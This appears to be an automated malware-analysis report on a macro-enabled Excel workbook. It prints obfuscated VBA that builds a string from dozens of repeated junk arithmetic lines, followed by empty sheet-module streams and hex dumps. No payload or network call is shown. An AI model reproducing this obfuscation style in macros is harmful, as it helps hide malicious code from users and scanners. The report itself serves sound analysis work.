mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & " " + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907""" + vbCrLf
mu38swif2 = mu38swif2 & "            lifwjifwbyg8dsi9jf35hu4ifdg3yuie3 = ""-47345+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*578

VBA File Name: Sheet1.cls, Stream Size: 991

General
Stream Path:	VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	991
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 9c a9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 991

General
Stream Path:	VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	991
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b . 0 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 8c 30 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 991

General
Stream Path:	VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	991
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b ; . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 3b f5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet4.cls, Stream Size: 991

General
Stream Path:	VBA/Sheet4
VBA File Name:	Sheet4.cls
Stream Size:	991
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b . / . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 ee 2f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General
Stream Path:	VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	999
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b 3 q . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 33 71 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
"ThisWorkbook"
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	662
Entropy:	5.20391297771
Base64 Encoded:	True
Data ASCII:	I D = " { A 8 A 8 8 0 6 2 - E A 0 3 - 4 E 0 2 - B A D 3 - 3 5 B C 2 2 0 A A 2 1 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 4 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D =
